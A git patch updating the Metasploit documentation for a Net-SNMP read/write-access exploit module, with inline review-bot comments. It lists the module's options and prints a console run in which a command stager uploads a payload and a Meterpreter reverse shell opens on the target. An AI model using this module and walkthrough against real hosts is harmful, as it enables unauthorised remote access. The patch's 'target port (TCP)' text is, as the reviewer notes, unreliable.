From 5f6ecd2ff9158e0843d09a16709caf7bace2f7de Mon Sep 17 00:00:00 2001 From: Steve Date: Wed, 14 Feb 2018 16:58:14 +0000 Subject: [PATCH] Documentation update --- .../exploit/linux/snmp/net_snmpd_rw_access.md | 62 +++++++++++++------ 1 file changed, 44 insertions(+), 18 deletions(-) diff --git a/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md b/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md index 5942b59a1d..12c12f2764 100644 --- a/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md +++ b/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md 
@@ -15,13 +15,24 @@ 8. You should get a session ## Options - This module accepts 'RHOST' and 'RPORT' to specify target address and port respectively. - 'FILEPATH' specifies where to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp. - 'COMMUNITY' is a read/write community string of the target Net-SNMP service. - 'VERSION' selects the SNMP protocol version. Accepted values are '1' or '2c'. - 'CHUNKSIZE' is the maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments. - 'TIMEOUT' specifies the maximum time to allow SNMP to timeout. + **FILEPATH** + The location to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp. + **COMMUNITY** + The read/write community string of the target Net-SNMP service. + + **VERSION** + The SNMP protocol version. Accepted values are '1' or '2c'. + + + **CHUNKSIZE** + The maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments. + Note that cmdstager payloads are modified to allow further escaping, so the values limits may change between cmdstager flavors. + Possibly related to: [https://sourceforge.net/p/net-snmp/bugs/2542/] + **TIMEOUT** + Specifies the maximum time to allow SNMP to timeout. + + ## Scenario ``` 
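Review bot: the new **CHUNKSIZE** paragraph writes the bug reference as `[https://sourceforge.net/p/net-snmp/bugs/2542/]`, which in Markdown renders as a bare URL inside literal square brackets rather than a link; use the page's own link form, e.g. `Possibly related to: [net-snmp bug #2542](https://sourceforge.net/p/net-snmp/bugs/2542/)`. In the same paragraph "the values limits may change" should read "the value limits may change" (or "the usable value may change between cmdstager flavors"). The **TIMEOUT** text "Specifies the maximum time to allow SNMP to timeout" is circular; "The SNMP request timeout, in seconds" says what the option does. Finally, the spacing is uneven: there is no blank line between the **FILEPATH** and **COMMUNITY** entries but two before **CHUNKSIZE**, and the old lead sentence documenting `RHOST`/`RPORT` is removed without replacing it, so those two options are now undocumented in this section even though they still appear in the options table below.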
@@ -63,9 +74,15 @@ FILEPATH /tmp yes file path to write to RETRIES 1 yes SNMP Retries RHOST 192.168.1.3 yes The target address - RPORT 161 yes The target port (UDP) + RPORT 161 yes The target port (TCP) + SHELL /bin/bash yes Shell to call with -c argument + SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 + SRVPORT 8080 yes The local port to listen on. + SSL false no Negotiate SSL for incoming connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) TIMEOUT 1 yes SNMP Timeout - VERSION 2c yes SNMP Version <1/2c> + URIPATH no The URI to use for this exploit (default is random) + VERSION 2c yes SNMP Version <1/2c> Payload information: Space: 4096 
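Review bot: the `RPORT` line changes from "The target port (UDP)" to "The target port (TCP)", but SNMP on port 161 is a UDP service and this module talks to it over UDP; if the new text is pasted verbatim from `show options`, the misleading string comes from the module's option definition and should be corrected there rather than propagated into the docs, and if it was edited by hand it should stay "(UDP)". The hunk also introduces `SHELL`, `SRVHOST`, `SRVPORT`, `SSL`, `SSLCert` and `URIPATH`, which belong to a cmdstager flavor that serves the payload over HTTP; none of them are covered in the Options section, and the doc should say which flavor (or `CMDSTAGER::FLAVOR` setting) produces this listing so readers understand why an SNMP exploit now needs a local listener on 8080.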
@@ -79,16 +96,25 @@ https://www.intelisecure.com msf exploit(linux/snmp/net_snmpd_rw_access) > run - + [*] Started reverse TCP handler on 192.168.1.2:4444 - [*] Writing to NET-SNMP-EXTEND-MIB with given payload - [*] Payload generated. Sending in 200 byte chunk increments. - [*] Sent chunked executable. Now executing payload - [*] Sending stage (849108 bytes) to 192.168.1.3 - [+] SNMP request timeout (this is promising). - + [*] Command Stager progress - 1.11% done (199/17924 bytes) + [*] Command Stager progress - 2.23% done (399/17924 bytes) + [*] Command Stager progress - 3.34% done (598/17924 bytes) + [*] Command Stager progress - 4.45% done (797/17924 bytes) + ... Redacted ... + [*] Command Stager progress - 98.64% done (17681/17924 bytes) + [*] Command Stager progress - 99.72% done (17873/17924 bytes) + [*] Sending stage (857352 bytes) to 192.168.1.3 + [*] Meterpreter session 30 opened (192.168.1.2:4444 -> 192.168.1.3:54230) at 2018-02-14 16:52:49 +0000 + [-] Exploit failed: SNMP::RequestTimeout host 192.168.1.3 not responding + [*] Exploit completed, but no session was created. + msf exploit(linux/snmp/net_snmpd_rw_access) > sessions -i 30 + [*] Starting interaction with 30... + + meterpreter > getuid + Server username: uid=121, gid=129, euid=121, egid=129 meterpreter > exit - [*] Shutting down Meterpreter... - - [*] 192.168.1.3 - Meterpreter session 1 closed. Reason: User exit + [*] 192.168.1.3 - Meterpreter session 30 closed. Reason: User exit + ```
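Review bot: the new scenario output shows "Meterpreter session 30 opened" immediately followed by "[-] Exploit failed: SNMP::RequestTimeout host 192.168.1.3 not responding" and "Exploit completed, but no session was created", which is contradictory as written and replaces the removed line "[+] SNMP request timeout (this is promising)." that told the reader the timeout is expected. Either the module should rescue the timeout after the payload has been executed (as the old output suggests it once did), or the doc needs a sentence below the listing explaining that the SNMP request blocks once the extend command runs the payload, the `RequestTimeout` is expected, and the session is still usable via `sessions -i <id>` as the subsequent `getuid` shows. As it stands a first-time user will read "no session was created" as a failure.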